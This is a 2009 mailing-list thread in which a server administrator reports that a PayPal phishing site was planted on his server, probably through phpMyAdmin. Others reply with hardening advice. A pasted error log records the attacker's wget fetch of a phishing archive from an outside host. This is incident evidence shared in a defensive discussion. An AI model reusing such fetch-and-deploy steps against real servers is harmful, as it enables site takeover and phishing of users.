Everyone, This morning I received a notice from PayPal that one of our sites got hacked and was spoofing a PayPal web site. When I checked the the site, I was surprised to find they were correct. About 5 days a go we had a server that got hacked and somehow the file paypal.com.tar got uploaded to our server and then stored in a a subdirectory of /var/www/. I had previously started a mysqld server and planned on using it for web authorizations. I had not been able to work on it, but left it in place. I looked like the hacker downloaded his paypal spoof files into a subdirectory of /var/www/phpmyadmin. I am running 5.3 with all current updates. I do not have telnet or ftp active on this server, and have password authentication of sshd turned off. I have tried to obtain dialog with PayPal about this but they have not responded to my queries. If any of you have had some experience with this I would be interested in knowing how this may have happened. I have shutdown the mysqld server as well as removed access in httpd.conf of the /var/www/phpmyadmin directory in order to shutdown the spoofing site. If any of you have a leg up on this I would appreciate your help. Greg Ennis P.S. I found the following entry in my error_log of /var/log/httpd/ : [Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39 --00:21:14-- http://code.go.ro/paypal.com.tar Resolving code.go.ro... 81.196.20.134 Connecting to code.go.ro|81.196.20.134|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 645120 (630K) [application/x-tar] Saving to: `paypal.com.tar' 0K .......... .......... .......... .......... .......... 7% 70.0K 8s 50K .......... .......... .......... .......... .......... 15% 265K 5s 100K .......... .......... .......... .......... .......... 23% 284K 3s 150K .......... .......... .......... .......... .......... 31% 1.81M 2s 200K .......... .......... .......... .......... .......... 39% 1.79M 2s 250K .......... .......... .......... .......... .......... 47% 323K 1s 300K .......... .......... .......... .......... .......... 55% 1.80M 1s 350K .......... .......... .......... .......... .......... 63% 1.76M 1s 400K .......... .......... .......... .......... .......... 71% 431K 1s 450K .......... .......... .......... .......... .......... 79% 1.77M 0s 500K .......... .......... .......... .......... .......... 87% 1.75M 0s 550K .......... .......... .......... .......... .......... 95% 1.82M 0s 600K .......... .......... .......... 100% 1.87M=1.6s 00:21:16 (405 KB/s) - `paypal.com.tar' saved [645120/645120] sh: line 0: cd: pma: Not a directory gzip: stdin: not in gzip format tar: Child returned status 1 tar: Error exit delayed from previous errors
On Fri, Aug 21, 2009 at 04:08:43PM -0500, Gregory P. Ennis wrote:> Everyone, > > This morning I received a notice from PayPal that one of our sites got > hacked and was spoofing a PayPal web site. > > When I checked the the site, I was surprised to find they were correct. > About 5 days a go we had a server that got hacked and somehow the file > paypal.com.tar got uploaded to our server and then stored in a a > subdirectory of /var/www/. > > I had previously started a mysqld server and planned on using it for web > authorizations. I had not been able to work on it, but left it in > place. I looked like the hacker downloaded his paypal spoof files into > a subdirectory of /var/www/phpmyadmin. > > I am running 5.3 with all current updates. > > I do not have telnet or ftp active on this server, and have password > authentication of sshd turned off. > > I have tried to obtain dialog with PayPal about this but they have not > responded to my queries. If any of you have had some experience with > this I would be interested in knowing how this may have happened. I > have shutdown the mysqld server as well as removed access in httpd.conf > of the /var/www/phpmyadmin directory in order to shutdown the spoofing > site. > > If any of you have a leg up on this I would appreciate your help.Some advice (assuming the culprit here is phpMyAdmin): - Keep phpMyAdmin up to date. Best way to do this is to use a package from a well known repository like EPEL that keeps the package at the latest version for you. - Run with SELinux Enforcing - Protect phpMyAdmin with Basic HTTP authentication instead of relying only on phpMyAdmin's authentication which does nothing to prevent the exploitation of many URL-based vulnerabilities. Ray
Am 21.08.2009 um 23:08 schrieb Gregory P. Ennis:> > I have tried to obtain dialog with PayPal about this but they have not > responded to my queries.Big surprise. They're like ebay (well, they *are* ebay...). Only boilerplate responses. Or nothing. In their defense, they must get a lot of spam. [....] Interesting. What version of phpmyadmin was that? Rainer
Gregory P. Ennis wrote:> P.S. I found the following entry in my error_log of /var/log/httpd/ : > > [Sun Aug 16 04:26:19 2009] [info] Server built: Jul 14 2009 06:02:39 > --00:21:14-- http://code.go.ro/paypal.com.tar > Resolving code.go.ro... 81.196.20.134 > Connecting to code.go.ro|81.196.20.134|:80... connected. > HTTP request sent, awaiting response... 200 OK > Length: 645120 (630K) [application/x-tar] > Saving to: `paypal.com.tar' >.... looks like they spoofed something on your server, probably some kinda sloppy php, into running wget. I'd take a look at the access_log around the same timestamp to see if there any hints as to how they did this. http://xkcd.com/327/
On Fri, 21 Aug 2009, Gregory P. Ennis wrote:> place. I looked like the hacker downloaded his paypal spoof files into > a subdirectory of /var/www/phpmyadmin > > I am running 5.3 with all current updates.and third party software as well. We do not ship phpmyadmin, and clearly and repeatedly caution against it in the IRC channel -- its CVE history is appalling, and people are just not willing to remove it, or limit it to just a specific IP (not that I expect its ACL model to work either) -- Russ herrold